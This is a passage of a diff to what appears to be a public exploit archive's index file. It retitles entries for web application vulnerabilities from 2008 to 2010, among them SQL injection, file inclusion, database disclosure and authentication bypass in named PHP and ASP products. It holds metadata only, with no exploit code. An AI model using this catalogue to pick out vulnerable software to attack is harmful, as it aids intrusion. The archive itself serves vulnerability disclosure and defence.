'id' SQL Injection",2008-12-12,InjEctOr5,php,webapps,0 +7439,platforms/php/webapps/7439.txt,"Umer Inc Songs Portal Script - 'id' Parameter SQL Injection",2008-12-12,InjEctOr5,php,webapps,0 7440,platforms/asp/webapps/7440.txt,"ColdFusion Scripts Red_Reservations - Database Disclosure",2008-12-12,Cyber-Zone,asp,webapps,0 7441,platforms/php/webapps/7441.txt,"Joomla! Component live chat - SQL Injection / Open Proxy",2008-12-12,jdc,php,webapps,0 7443,platforms/php/webapps/7443.txt,"FlexPHPNews 0.0.6 & PRO - Authentication Bypass",2008-12-14,Osirys,php,webapps,0 7444,platforms/php/webapps/7444.txt,"Simple Text-File Login script (SiTeFiLo) 1.0.6 - File Disclosure / Remote File Inclusion",2008-12-14,Osirys,php,webapps,0 7445,platforms/asp/webapps/7445.txt,"Discussion Web 4 - Remote Database Disclosure",2008-12-14,Pouya_Server,asp,webapps,0 -7446,platforms/asp/webapps/7446.txt,"ASPired2Quote - 'quote.mdb' Remote Database Disclosure",2008-12-14,Pouya_Server,asp,webapps,0 -7447,platforms/asp/webapps/7447.txt,"ASP-DEV Internal E-Mail System - (Authentication Bypass) SQL Injection",2008-12-14,Pouya_Server,asp,webapps,0 +7446,platforms/asp/webapps/7446.txt,"ASPired2Quote - Remote Database Disclosure",2008-12-14,Pouya_Server,asp,webapps,0 +7447,platforms/asp/webapps/7447.txt,"ASP-DEV Internal E-Mail System - Authentication Bypass",2008-12-14,Pouya_Server,asp,webapps,0 7448,platforms/php/webapps/7448.txt,"autositephp 2.0.3 - Local File Inclusion / Cross-Site Request Forgery / Edit File",2008-12-14,SirGod,php,webapps,0 -7449,platforms/php/webapps/7449.txt,"iyzi Forum 1.0b3 - (iyziforum.mdb) Database Disclosure",2008-12-14,"Ghost Hacker",php,webapps,0 -7450,platforms/asp/webapps/7450.txt,"CodeAvalanche FreeForum - 'CAForum.mdb' Database Disclosure",2008-12-14,"Ghost Hacker",asp,webapps,0 +7449,platforms/php/webapps/7449.txt,"iyzi Forum 1.0b3 - Database Disclosure",2008-12-14,"Ghost Hacker",php,webapps,0 +7450,platforms/asp/webapps/7450.txt,"CodeAvalanche FreeForum - Database Disclosure",2008-12-14,"Ghost Hacker",asp,webapps,0 7451,platforms/php/webapps/7451.txt,"PHP weather 2.2.2 - Local File Inclusion / Cross-Site Scripting",2008-12-14,ahmadbady,php,webapps,0 -7453,platforms/php/webapps/7453.txt,"FLDS 1.2a - (redir.php id) SQL Injection",2008-12-14,nuclear,php,webapps,0 +7453,platforms/php/webapps/7453.txt,"FLDS 1.2a - 'redir.php' SQL Injection",2008-12-14,nuclear,php,webapps,0 7455,platforms/php/webapps/7455.txt,"The Rat CMS Alpha 2 - 'download.php' Remote",2008-12-14,x0r,php,webapps,0 7456,platforms/php/webapps/7456.txt,"AvailScript Article Script - Arbitrary File Upload",2008-12-14,S.W.A.T.,php,webapps,0 7457,platforms/php/webapps/7457.txt,"AvailScript Classmate Script - Arbitrary File Upload",2008-12-14,S.W.A.T.,php,webapps,0 -7458,platforms/php/webapps/7458.txt,"Mediatheka 4.2 - (index.php lang) Local File Inclusion",2008-12-14,Osirys,php,webapps,0 +7458,platforms/php/webapps/7458.txt,"Mediatheka 4.2 - 'lang' Parameter Local File Inclusion",2008-12-14,Osirys,php,webapps,0 7459,platforms/php/webapps/7459.txt,"CFAGCMS 1 - Remote File Inclusion",2008-12-14,BeyazKurt,php,webapps,0 7461,platforms/php/webapps/7461.txt,"Flatnux - html/JavaScript Injection Cookie Grabber Exploit",2008-12-14,gmda,php,webapps,0 7462,platforms/asp/webapps/7462.txt,"ASPSiteWare Home Builder 1.0/2.0 - SQL Injection",2008-12-14,AlpHaNiX,asp,webapps,0 7463,platforms/php/webapps/7463.txt,"ASPSiteWare Automotive Dealer 1.0 / 2.0 - SQL Injection",2008-12-14,AlpHaNiX,php,webapps,0 7464,platforms/asp/webapps/7464.txt,"ASPSiteWare RealtyListing 1.0 / 2.0 - SQL Injection",2008-12-14,AlpHaNiX,asp,webapps,0 7465,platforms/php/webapps/7465.txt,"isweb CMS 3.0 - SQL Injection / Cross-Site Scripting",2008-12-14,XaDoS,php,webapps,0 -7466,platforms/asp/webapps/7466.txt,"Forest Blog 1.3.2 - (blog.mdb) Remote Database Disclosure",2008-12-15,"Cold Zero",asp,webapps,0 -7468,platforms/asp/webapps/7468.txt,"CodeAvalanche Directory - 'CADirectory.mdb' Database Disclosure",2008-12-15,Pouya_Server,asp,webapps,0 -7469,platforms/asp/webapps/7469.txt,"CodeAvalanche FreeForAll - 'CAFFAPage.mdb' Database Disclosure",2008-12-15,Pouya_Server,asp,webapps,0 +7466,platforms/asp/webapps/7466.txt,"Forest Blog 1.3.2 - Remote Database Disclosure",2008-12-15,"Cold Zero",asp,webapps,0 +7468,platforms/asp/webapps/7468.txt,"CodeAvalanche Directory - Database Disclosure",2008-12-15,Pouya_Server,asp,webapps,0 +7469,platforms/asp/webapps/7469.txt,"CodeAvalanche FreeForAll - Database Disclosure",2008-12-15,Pouya_Server,asp,webapps,0 7470,platforms/asp/webapps/7470.txt,"CodeAvalanche FreeWallpaper - Remote Database Disclosure",2008-12-15,Pouya_Server,asp,webapps,0 -7471,platforms/asp/webapps/7471.txt,"CodeAvalanche Articles - 'CAArticles.mdb' Database Disclosure",2008-12-15,Pouya_Server,asp,webapps,0 -7472,platforms/asp/webapps/7472.txt,"CodeAvalanche RateMySite - 'CARateMySite.mdb' Database Disclosure",2008-12-15,Pouya_Server,asp,webapps,0 +7471,platforms/asp/webapps/7471.txt,"CodeAvalanche Articles - Database Disclosure",2008-12-15,Pouya_Server,asp,webapps,0 +7472,platforms/asp/webapps/7472.txt,"CodeAvalanche RateMySite - Database Disclosure",2008-12-15,Pouya_Server,asp,webapps,0 7473,platforms/php/webapps/7473.php,"EZ Publish < 3.9.5/3.10.1/4.0.1 - (token) Privilege Escalation",2008-12-15,s4avrd0w,php,webapps,0 -7474,platforms/php/webapps/7474.txt,"FLDS 1.2a - (lpro.php id) SQL Injection",2008-12-15,nuclear,php,webapps,0 -7475,platforms/php/webapps/7475.txt,"BabbleBoard 1.1.6 - 'Username' Cross-Site Request Forgery/Cookie Grabber Exploit",2008-12-15,SirGod,php,webapps,0 +7474,platforms/php/webapps/7474.txt,"FLDS 1.2a - 'lpro.php' SQL Injection",2008-12-15,nuclear,php,webapps,0 +7475,platforms/php/webapps/7475.txt,"BabbleBoard 1.1.6 - Cross-Site Request Forgery/Cookie Grabber Exploit",2008-12-15,SirGod,php,webapps,0 7476,platforms/php/webapps/7476.txt,"Mediatheka 4.2 - Blind SQL Injection",2008-12-15,StAkeR,php,webapps,0 -7478,platforms/php/webapps/7478.txt,"The Rat CMS Alpha 2 - (Authentication Bypass) SQL Injection",2008-12-15,x0r,php,webapps,0 -7479,platforms/php/webapps/7479.txt,"XOOPS Module Amevents - 'print.php id' SQL Injection",2008-12-15,nétRoot,php,webapps,0 -7480,platforms/php/webapps/7480.txt,"CadeNix - 'cid' SQL Injection",2008-12-15,HaCkeR_EgY,php,webapps,0 +7478,platforms/php/webapps/7478.txt,"The Rat CMS Alpha 2 - Authentication Bypass",2008-12-15,x0r,php,webapps,0 +7479,platforms/php/webapps/7479.txt,"XOOPS Module Amevents - SQL Injection",2008-12-15,nétRoot,php,webapps,0 +7480,platforms/php/webapps/7480.txt,"CadeNix - SQL Injection",2008-12-15,HaCkeR_EgY,php,webapps,0 7481,platforms/php/webapps/7481.txt,"WorkSimple 1.2.1 - Remote File Inclusion / Sensitive Data Disclosure",2008-12-15,Osirys,php,webapps,0 7482,platforms/php/webapps/7482.txt,"Aperto Blog 0.1.1 - Local File Inclusion / SQL Injection",2008-12-15,NoGe,php,webapps,0 -7483,platforms/php/webapps/7483.txt,"CFAGCMS 1 - 'right.php title' SQL Injection",2008-12-15,ZoRLu,php,webapps,0 +7483,platforms/php/webapps/7483.txt,"CFAGCMS 1 - SQL Injection",2008-12-15,ZoRLu,php,webapps,0 7484,platforms/asp/webapps/7484.txt,"Click&BaneX - Multiple SQL Injections",2008-12-15,AlpHaNiX,asp,webapps,0 7485,platforms/asp/webapps/7485.txt,"clickandemail - SQL Injection / Cross-Site Scripting",2008-12-15,AlpHaNiX,asp,webapps,0 7486,platforms/asp/webapps/7486.txt,"click&rank - SQL Injection / Cross-Site Scripting",2008-12-15,AlpHaNiX,asp,webapps,0 -7487,platforms/php/webapps/7487.txt,"FaScript FaUpload - 'download.php' SQL Injection",2008-12-16,"Aria-Security Team",php,webapps,0 -7488,platforms/asp/webapps/7488.txt,"Web Wiz Guestbook 8.21 - (WWGGuestbook.mdb) DD",2008-12-16,"Cold Zero",asp,webapps,0 -7489,platforms/php/webapps/7489.pl,"FLDS 1.2a - report.php (linkida) SQL Injection",2008-12-16,ka0x,php,webapps,0 +7487,platforms/php/webapps/7487.txt,"FaScript FaUpload - SQL Injection",2008-12-16,"Aria-Security Team",php,webapps,0 +7488,platforms/asp/webapps/7488.txt,"Web Wiz Guestbook 8.21 - Database Disclosure",2008-12-16,"Cold Zero",asp,webapps,0 +7489,platforms/php/webapps/7489.pl,"FLDS 1.2a - 'report.php' SQL Injection",2008-12-16,ka0x,php,webapps,0 7490,platforms/php/webapps/7490.php,"Aiyoota! CMS - Blind SQL Injection",2008-12-16,Lidloses_Auge,php,webapps,0 7491,platforms/asp/webapps/7491.txt,"Nukedit 4.9.8 - Remote Database Disclosure",2008-12-16,Cyber.Zer0,asp,webapps,0 7493,platforms/php/webapps/7493.txt,"Liberum Help Desk 0.97.3 - SQL Injection / File Disclosure",2008-12-16,"Cold Zero",php,webapps,0 7494,platforms/php/webapps/7494.txt,"Zelta E Store - Arbitrary File Upload / Bypass / SQL Injection / Blind SQL Injection",2008-12-16,ZoRLu,php,webapps,0 -7495,platforms/asp/webapps/7495.txt,"Gnews Publisher .NET - (authors.asp authorID) SQL Injection",2008-12-16,AlpHaNiX,asp,webapps,0 +7495,platforms/asp/webapps/7495.txt,"Gnews Publisher .NET - SQL Injection",2008-12-16,AlpHaNiX,asp,webapps,0 7497,platforms/php/webapps/7497.txt,"RSMScript 1.21 - Cross-Site Scripting / Insecure Cookie Handling",2008-12-17,Osirys,php,webapps,0 7499,platforms/asp/webapps/7499.txt,"BP Blog 6.0/7.0/8.0/9.0 - Remote Database Disclosure",2008-12-17,Dxil,asp,webapps,0 7500,platforms/php/webapps/7500.txt,"K&S Shopsysteme - Arbitrary File Upload",2008-12-17,mNt,php,webapps,0 7502,platforms/php/webapps/7502.txt,"r.cms 2.0 - Multiple SQL Injections",2008-12-17,Lidloses_Auge,php,webapps,0 -7504,platforms/php/webapps/7504.txt,"Joomla! Component Tech Article 1.x - (item) SQL Injection",2008-12-17,InjEctOr5,php,webapps,0 -7506,platforms/php/webapps/7506.txt,"TinyMCE 2.0.1 - (index.php menuID) SQL Injection",2008-12-17,AnGeL25dZ,php,webapps,0 +7504,platforms/php/webapps/7504.txt,"Joomla! Component Tech Article 1.x - SQL Injection",2008-12-17,InjEctOr5,php,webapps,0 +7506,platforms/php/webapps/7506.txt,"TinyMCE 2.0.1 - 'menuID' Parameter SQL Injection",2008-12-17,AnGeL25dZ,php,webapps,0 7507,platforms/php/webapps/7507.pl,"Lizardware CMS 0.6.0 - Blind SQL Injection",2008-12-17,StAkeR,php,webapps,0 -7508,platforms/asp/webapps/7508.txt,"QuickerSite Easy CMS - 'QuickerSite.mdb' Database Disclosure",2008-12-17,AlpHaNiX,asp,webapps,0 +7508,platforms/asp/webapps/7508.txt,"QuickerSite Easy CMS - Database Disclosure",2008-12-17,AlpHaNiX,asp,webapps,0 7509,platforms/php/webapps/7509.txt,"Mini File Host 1.x - Arbitrary .PHP File Upload",2008-12-18,Pouya_Server,php,webapps,0 7510,platforms/php/webapps/7510.txt,"2532/Gigs 1.2.2 Stable - Multiple Vulnerabilities",2008-12-18,Osirys,php,webapps,0 7511,platforms/php/webapps/7511.txt,"2532/Gigs 1.2.2 Stable - Remote Login Bypass",2008-12-18,StAkeR,php,webapps,0 7512,platforms/php/webapps/7512.php,"2532/Gigs 1.2.2 Stable - Remote Command Execution",2008-12-18,StAkeR,php,webapps,0 7513,platforms/php/webapps/7513.txt,"Calendar Script 1.1 - Insecure Cookie Handling",2008-12-18,Osirys,php,webapps,0 -7514,platforms/php/webapps/7514.txt,"I-Rater Basic - 'messages.php' SQL Injection",2008-12-18,boom3rang,php,webapps,0 +7514,platforms/php/webapps/7514.txt,"I-Rater Basic - SQL Injection",2008-12-18,boom3rang,php,webapps,0 7515,platforms/php/webapps/7515.txt,"phpclanwebsite 1.23.3 fix pack #5 - Multiple Vulnerabilities",2008-12-18,s4avrd0w,php,webapps,0 -7517,platforms/php/webapps/7517.txt,"Injader CMS 2.1.1 - 'id' SQL Injection",2008-12-18,fuzion,php,webapps,0 +7517,platforms/php/webapps/7517.txt,"Injader CMS 2.1.1 - 'id' Parameter SQL Injection",2008-12-18,fuzion,php,webapps,0 7518,platforms/php/webapps/7518.txt,"Gobbl CMS 1.0 - Insecure Cookie Handling",2008-12-18,x0r,php,webapps,0 -7519,platforms/php/webapps/7519.txt,"MyPHPsite - 'index.php mod' Local File Inclusion",2008-12-18,Piker,php,webapps,0 -7522,platforms/php/webapps/7522.pl,"MyPBS - 'index.php seasonID' SQL Injection",2008-12-19,Piker,php,webapps,0 +7519,platforms/php/webapps/7519.txt,"MyPHPsite - Local File Inclusion",2008-12-18,Piker,php,webapps,0 +7522,platforms/php/webapps/7522.pl,"MyPBS - 'seasonID' Parameter SQL Injection",2008-12-19,Piker,php,webapps,0 7523,platforms/php/webapps/7523.php,"ReVou Twitter Clone - Admin Password Change",2008-12-19,G4N0K,php,webapps,0 7524,platforms/php/webapps/7524.txt,"Online Keyword Research Tool - 'download.php' File Disclosure",2008-12-19,"Cold Zero",php,webapps,0 -7525,platforms/php/webapps/7525.txt,"Extract Website - 'download.php Filename' File Disclosure",2008-12-19,"Cold Zero",php,webapps,0 +7525,platforms/php/webapps/7525.txt,"Extract Website - 'Filename' Parameter File Disclosure",2008-12-19,"Cold Zero",php,webapps,0 7526,platforms/php/webapps/7526.txt,"myPHPscripts Login Session 2.0 - Cross-Site Scripting / Database Disclosure",2008-12-19,Osirys,php,webapps,0 -7527,platforms/php/webapps/7527.txt,"FreeLyrics 1.0 - (source.php p) Remote File Disclosure",2008-12-19,Piker,php,webapps,0 +7527,platforms/php/webapps/7527.txt,"FreeLyrics 1.0 - Remote File Disclosure",2008-12-19,Piker,php,webapps,0 7528,platforms/php/webapps/7528.pl,"OneOrZero helpdesk 1.6.x. - Arbitrary File Upload",2008-12-19,Ams,php,webapps,0 7529,platforms/php/webapps/7529.txt,"Constructr CMS 3.02.5 stable - Multiple Vulnerabilities",2008-12-19,fuzion,php,webapps,0 -7530,platforms/php/webapps/7530.pl,"Userlocator 3.0 - (y) Blind SQL Injection",2008-12-21,katharsis,php,webapps,0 +7530,platforms/php/webapps/7530.pl,"Userlocator 3.0 - Blind SQL Injection",2008-12-21,katharsis,php,webapps,0 7531,platforms/php/webapps/7531.txt,"ReVou Twitter Clone - Arbitrary File Upload",2008-12-21,S.W.A.T.,php,webapps,0 -7532,platforms/php/webapps/7532.txt,"chicomas 2.0.4 - Database Backup / File Disclosure / Cross-Site Scripting",2008-12-21,BugReport.IR,php,webapps,0 +7532,platforms/php/webapps/7532.txt,"Chicomas 2.0.4 - Database Backup / File Disclosure / Cross-Site Scripting",2008-12-21,BugReport.IR,php,webapps,0 7534,platforms/asp/webapps/7534.txt,"Emefa Guestbook 3.0 - Remote Database Disclosure",2008-12-21,Cyber.Zer0,asp,webapps,0 -7537,platforms/php/webapps/7537.txt,"BLOG 1.55B - (image_upload.php) Arbitrary File Upload",2008-12-21,Piker,php,webapps,0 +7537,platforms/php/webapps/7537.txt,"BLOG 1.55B - 'image_upload.php' Arbitrary File Upload",2008-12-21,Piker,php,webapps,0 7538,platforms/php/webapps/7538.txt,"Joomla! Component com_hbssearch 1.0 - Blind SQL Injection",2008-12-21,boom3rang,php,webapps,0 7539,platforms/php/webapps/7539.txt,"Joomla! Component com_tophotelmodule 1.0 - Blind SQL Injection",2008-12-21,boom3rang,php,webapps,0 7540,platforms/php/webapps/7540.txt,"phpg 1.6 - Cross-Site Scripting / Full Path Disclosure / Denial of Service",2008-12-21,"Anarchy Angel",php,webapps,0 -7541,platforms/php/webapps/7541.pl,"RSS Simple News - 'news.php pid' SQL Injection",2008-12-22,Piker,php,webapps,0 -7542,platforms/php/webapps/7542.txt,"Text Lines Rearrange Script - 'Filename' File Disclosure",2008-12-22,SirGod,php,webapps,0 +7541,platforms/php/webapps/7541.pl,"RSS Simple News - SQL Injection",2008-12-22,Piker,php,webapps,0 +7542,platforms/php/webapps/7542.txt,"Text Lines Rearrange Script - 'Filename' Parameter File Disclosure",2008-12-22,SirGod,php,webapps,0 7543,platforms/php/webapps/7543.txt,"WordPress Plugin Page Flip Image Gallery 0.2.2 - Remote File Disclosure",2008-12-22,GoLd_M,php,webapps,0 -7544,platforms/php/webapps/7544.txt,"Pligg 9.9.5b - (check_url.php url) Arbitrary File Upload / SQL Injection",2008-12-22,Ams,php,webapps,0 +7544,platforms/php/webapps/7544.txt,"Pligg 9.9.5b - Arbitrary File Upload / SQL Injection",2008-12-22,Ams,php,webapps,0 7545,platforms/php/webapps/7545.txt,"yourplace 1.0.2 - Multiple Vulnerabilities / Remote Code Execution",2008-12-22,Osirys,php,webapps,0 -7546,platforms/php/webapps/7546.txt,"Joomla! Component Volunteer 2.0 - (job_id) SQL Injection",2008-12-22,boom3rang,php,webapps,0 +7546,platforms/php/webapps/7546.txt,"Joomla! Component Volunteer 2.0 - SQL Injection",2008-12-22,boom3rang,php,webapps,0 7548,platforms/php/webapps/7548.php,"SolarCMS 0.53.8 - (Forum) Remote Cookies Disclosure",2008-12-22,StAkeR,php,webapps,0 7549,platforms/php/webapps/7549.txt,"Roundcube Webmail 0.2-3 Beta - Code Execution",2008-12-22,"Jacobo Avariento",php,webapps,0 -7551,platforms/php/webapps/7551.txt,"Calendar Script 1.1 - (Authentication Bypass) SQL Injection",2008-12-22,StAkeR,php,webapps,0 -7552,platforms/php/webapps/7552.txt,"REDPEACH CMS - (zv) SQL Injection",2008-12-22,Lidloses_Auge,php,webapps,0 +7551,platforms/php/webapps/7551.txt,"Calendar Script 1.1 - Authentication Bypass",2008-12-22,StAkeR,php,webapps,0 +7552,platforms/php/webapps/7552.txt,"REDPEACH CMS - SQL Injection",2008-12-22,Lidloses_Auge,php,webapps,0 7553,platforms/php/webapps/7553.sh,"Roundcube Webmail 0.2b - Remote Code Execution",2008-12-22,Hunger,php,webapps,0 7557,platforms/php/webapps/7557.txt,"PHPmotion 2.1 - Cross-Site Request Forgery",2008-12-23,Ausome1,php,webapps,0 -7558,platforms/php/webapps/7558.txt,"PHPLD 3.3 - (page.php name) Blind SQL Injection",2008-12-23,fuzion,php,webapps,0 +7558,platforms/php/webapps/7558.txt,"PHPLD 3.3 - Blind SQL Injection",2008-12-23,fuzion,php,webapps,0 7559,platforms/php/webapps/7559.php,"CMS NetCat 3.12 - (password_recovery.php) Blind SQL Injection",2008-12-23,s4avrd0w,php,webapps,0 7560,platforms/php/webapps/7560.txt,"CMS NetCat 3.12 - Multiple Vulnerabilities",2008-12-23,s4avrd0w,php,webapps,0 7561,platforms/php/webapps/7561.txt,"phpGreetCards - Cross-Site Scripting / Arbitrary File Upload",2008-12-23,ahmadbady,php,webapps,0 @@ -20407,7 +20407,7 @@ id,file,description,date,author,platform,type,port 7659,platforms/php/webapps/7659.txt,"WSN Guest 1.23 - 'Search' SQL Injection",2009-01-04,DaiMon,php,webapps,0 7660,platforms/php/webapps/7660.txt,"PHPMesFilms 1.0 - (index.php id) SQL Injection",2009-01-04,SuB-ZeRo,php,webapps,0 7663,platforms/php/webapps/7663.txt,"plxAutoReminder 3.7 - 'id' SQL Injection",2009-01-04,ZoRLu,php,webapps,0 -7664,platforms/php/webapps/7664.pl,"The Rat CMS Alpha 2 - 'viewarticle.php id' Blind SQL Injection",2009-01-04,darkjoker,php,webapps,0 +7664,platforms/php/webapps/7664.pl,"The Rat CMS Alpha 2 - Blind SQL Injection",2009-01-04,darkjoker,php,webapps,0 7665,platforms/asp/webapps/7665.txt,"Ayemsis Emlak Pro - 'acc.mdb' Database Disclosure",2009-01-05,ByALBAYX,asp,webapps,0 7666,platforms/asp/webapps/7666.txt,"Ayemsis Emlak Pro - (Authentication Bypass) SQL Injection",2009-01-05,ByALBAYX,asp,webapps,0 7667,platforms/php/webapps/7667.txt,"Joomla! Component simple_review 1.x - SQL Injection",2009-01-05,EcHoLL,php,webapps,0 @@ -20568,7 +20568,7 @@ id,file,description,date,author,platform,type,port 7911,platforms/php/webapps/7911.txt,"GLPI 0.71.3 - Multiple SQL Injections Vulnerabilities",2009-01-29,Zigma,php,webapps,0 7916,platforms/php/webapps/7916.txt,"Netartmedia Car Portal 1.0 - (Authentication Bypass) SQL Injection",2009-01-29,"Mehmet Ince",php,webapps,0 7917,platforms/php/webapps/7917.php,"PLE CMS 1.0 Beta 4.2 - (login.php school) Blind SQL Injection",2009-01-29,darkjoker,php,webapps,0 -7922,platforms/php/webapps/7922.txt,"Pligg 9.9.5 - Cross-Site Request Forgery / Protection Bypass / Captcha Bypass",2009-01-29,"Michael Brooks",php,webapps,0 +7922,platforms/php/webapps/7922.txt,"Pligg CMS 9.9.5 - Cross-Site Request Forgery / Protection Bypass / Captcha Bypass",2009-01-29,"Michael Brooks",php,webapps,0 7924,platforms/asp/webapps/7924.txt,"SalesCart - (Authentication Bypass) SQL Injection",2009-01-30,ByALBAYX,asp,webapps,0 7925,platforms/php/webapps/7925.txt,"Revou Twitter Clone - Cross-Site Scripting / SQL Injection",2009-01-30,nuclear,php,webapps,0 7927,platforms/php/webapps/7927.txt,"GNUBoard 4.31.04 - (09.01.30) Multiple Local+Remote Vulnerabilities",2009-01-30,make0day,php,webapps,0 @@ -20577,7 +20577,7 @@ id,file,description,date,author,platform,type,port 7932,platforms/php/webapps/7932.txt,"SkaLinks 1.5 - Authentication Bypass",2009-01-30,Dimi4,php,webapps,0 7933,platforms/php/webapps/7933.txt,"eVision CMS 2.0 - (field) SQL Injection",2009-01-30,darkjoker,php,webapps,0 7936,platforms/php/webapps/7936.txt,"sma-db 0.3.12 - Remote File Inclusion / Cross-Site Scripting",2009-02-02,ahmadbady,php,webapps,0 -7938,platforms/php/webapps/7938.txt,"Flatnux 2009-01-27 - (Job fields) Cross-Site Scripting / Iframe Injection (PoC)",2009-02-02,"Alfons Luja",php,webapps,0 +7938,platforms/php/webapps/7938.txt,"Flatnux 2009-01-27 - Cross-Site Scripting / Iframe Injection (PoC)",2009-02-02,"Alfons Luja",php,webapps,0 7939,platforms/php/webapps/7939.txt,"AJA Portal 1.2 (Windows) - Local File Inclusion",2009-02-02,ahmadbady,php,webapps,0 7940,platforms/php/webapps/7940.txt,"WholeHogSoftware Ware Support - (Authentication Bypass) SQL Injection",2009-02-02,ByALBAYX,php,webapps,0 7941,platforms/php/webapps/7941.txt,"WholeHogSoftware Password Protect - (Authentication Bypass) SQL Injection",2009-02-02,ByALBAYX,php,webapps,0 @@ -20602,7 +20602,7 @@ id,file,description,date,author,platform,type,port 7965,platforms/php/webapps/7965.txt,"technote 7.2 - Remote File Inclusion",2009-02-03,make0day,php,webapps,0 7967,platforms/php/webapps/7967.pl,"TxtBlog 1.0 Alpha - Remote Command Execution",2009-02-03,Osirys,php,webapps,0 7968,platforms/php/webapps/7968.php,"DreamPics Photo/Video Gallery - Blind SQL Injection",2009-02-03,"Mehmet Ince",php,webapps,0 -7969,platforms/php/webapps/7969.txt,"flatnux 2009-01-27 - Remote File Inclusion",2009-02-03,"Alfons Luja",php,webapps,0 +7969,platforms/php/webapps/7969.txt,"Flatnux 2009-01-27 - Remote File Inclusion",2009-02-03,"Alfons Luja",php,webapps,0 7972,platforms/php/webapps/7972.py,"OpenFiler 2.3 - (Authentication Bypass) Remote Password Change Exploit",2009-02-03,nonroot,php,webapps,0 7976,platforms/php/webapps/7976.txt,"Jaws 0.8.8 - Multiple Local File Inclusion",2009-02-04,fuzion,php,webapps,0 7977,platforms/php/webapps/7977.txt,"Syntax Desktop 2.7 - (synTarget) Local File Inclusion",2009-02-04,ahmadbady,php,webapps,0 @@ -20881,10 +20881,10 @@ id,file,description,date,author,platform,type,port 8480,platforms/php/webapps/8480.txt,"multi-lingual E-Commerce system 0.2 - Multiple Vulnerabilities",2009-04-20,"Salvatore Fresta",php,webapps,0 8481,platforms/php/webapps/8481.txt,"Studio Lounge Address Book 2.5 - (profile) Arbitrary File Upload",2009-04-20,JosS,php,webapps,0 8482,platforms/php/webapps/8482.txt,"Seditio CMS Events Plugin - (c) SQL Injection",2009-04-20,OoN_Boy,php,webapps,0 -8483,platforms/php/webapps/8483.txt,"flatnux 2009-03-27 - Arbitrary File Upload / Information Disclosure",2009-04-20,girex,php,webapps,0 +8483,platforms/php/webapps/8483.txt,"Flatnux 2009-03-27 - Arbitrary File Upload / Information Disclosure",2009-04-20,girex,php,webapps,0 8486,platforms/php/webapps/8486.txt,"webClassifieds 2005 - (Authentication Bypass) Insecure Cookie Handling",2009-04-20,"ThE g0bL!N",php,webapps,0 8487,platforms/php/webapps/8487.txt,"EZ Webitor - (Authentication Bypass) SQL Injection",2009-04-20,snakespc,php,webapps,0 -8488,platforms/php/webapps/8488.pl,"Pligg 9.9.0 - (editlink.php id) Blind SQL Injection",2009-04-20,"Rohit Bansal",php,webapps,0 +8488,platforms/php/webapps/8488.pl,"Pligg CMS 9.9.0 - 'editlink.php' Blind SQL Injection",2009-04-20,"Rohit Bansal",php,webapps,0 8491,platforms/php/webapps/8491.pl,"WysGui CMS 1.2b - (Insecure Cookie Handling) Blind SQL Injection",2009-04-20,YEnH4ckEr,php,webapps,0 8492,platforms/php/webapps/8492.txt,"WB News 2.1.2 - Insecure Cookie Handling",2009-04-20,"ThE g0bL!N",php,webapps,0 8493,platforms/php/webapps/8493.txt,"fungamez rc1 - Authentication Bypass / Local File Inclusion",2009-04-20,YEnH4ckEr,php,webapps,0 @@ -21589,7 +21589,7 @@ id,file,description,date,author,platform,type,port 9703,platforms/php/webapps/9703.txt,"phpPollScript 1.3 - (include_class) Remote File Inclusion",2009-09-16,cr4wl3r,php,webapps,0 9706,platforms/php/webapps/9706.txt,"Joomla! Component com_album 1.14 - Directory Traversal",2009-09-17,DreamTurk,php,webapps,0 9708,platforms/php/webapps/9708.txt,"OpenSiteAdmin 0.9.7b - (pageHeader.php path) Remote File Inclusion",2009-09-17,"EA Ngel",php,webapps,0 -9710,platforms/php/webapps/9710.txt,"CF Shopkart 5.3x - 'itemID' SQL Injection",2009-09-17,"learn3r hacker",php,webapps,0 +9710,platforms/php/webapps/9710.txt,"CF Shopkart 5.3x - 'itemID' Parameter SQL Injection",2009-09-17,"learn3r hacker",php,webapps,0 9711,platforms/php/webapps/9711.txt,"FMyClone 2.3 - Multiple SQL Injections",2009-09-17,"learn3r hacker",php,webapps,0 9712,platforms/php/webapps/9712.txt,"Nephp Publisher Enterprise 4.5 - (Authentication Bypass) SQL Injection",2009-09-17,"learn3r hacker",php,webapps,0 9713,platforms/php/webapps/9713.pl,"Joomla! Component com_jreservation 1.5 - 'pid' Blind SQL Injection",2009-09-17,"Chip d3 bi0s",php,webapps,0 @@ -22494,7 +22494,7 @@ id,file,description,date,author,platform,type,port 11547,platforms/php/webapps/11547.txt,"PHP Auktion Pro SQL - 'news.php' SQL Injection",2010-02-23,"Easy Laster",php,webapps,0 11548,platforms/php/webapps/11548.txt,"Top Auktion - 'news.php' SQL Injection",2010-02-23,"Easy Laster",php,webapps,0 11549,platforms/php/webapps/11549.pl,"Joomla! Component user_id com_sqlreport - Blind SQL Injection",2010-02-23,snakespc,php,webapps,0 -11550,platforms/php/webapps/11550.txt,"worksimple_1.3.2 - Multiple Vulnerabilities",2010-02-23,JIKO,php,webapps,0 +11550,platforms/php/webapps/11550.txt,"WorkSimple 1.3.2 - Multiple Vulnerabilities",2010-02-23,JIKO,php,webapps,0 11551,platforms/php/webapps/11551.txt,"Softbiz Jobs - Multiple SQL Injections",2010-02-23,"Easy Laster",php,webapps,0 11553,platforms/php/webapps/11553.txt,"Tinypug 0.9.5 - Cross-Site Request Forgery (Password Change)",2010-02-23,AmnPardaz,php,webapps,0 11554,platforms/php/webapps/11554.txt,"QuickDev 4 PHP - Database Disclosure",2010-02-23,ViRuSMaN,php,webapps,0 @@ -24319,7 +24319,7 @@ id,file,description,date,author,platform,type,port 15819,platforms/php/webapps/15819.txt,"Joomla! Component 'com_xmovie' 1.0 - Local File Inclusion",2010-12-24,KelvinX,php,webapps,0 15820,platforms/php/webapps/15820.txt,"SquareCMS 0.3.1 - (post.php) SQL Injection",2010-12-24,cOndemned,php,webapps,0 15822,platforms/php/webapps/15822.html,"CubeCart 3.0.6 - Cross-Site Request Forgery (Add Admin)",2010-12-24,"P0C T34M",php,webapps,0 -15824,platforms/php/webapps/15824.txt,"Pligg 1.1.2 - Blind SQL Injection / Cross-Site Scripting",2010-12-25,"Michael Brooks",php,webapps,0 +15824,platforms/php/webapps/15824.txt,"Pligg CMS 1.1.2 - Blind SQL Injection / Cross-Site Scripting",2010-12-25,"Michael Brooks",php,webapps,0 15825,platforms/php/webapps/15825.txt,"openauto 1.6.3 - Multiple Vulnerabilities",2010-12-25,"Michael Brooks",php,webapps,0 15826,platforms/php/webapps/15826.txt,"Traidnt Up 3.0 - Cross-Site Request Forgery",2010-12-25,"P0C T34M",php,webapps,0 15827,platforms/php/webapps/15827.txt,"Joomla! Component 'com_idoblog' - SQL 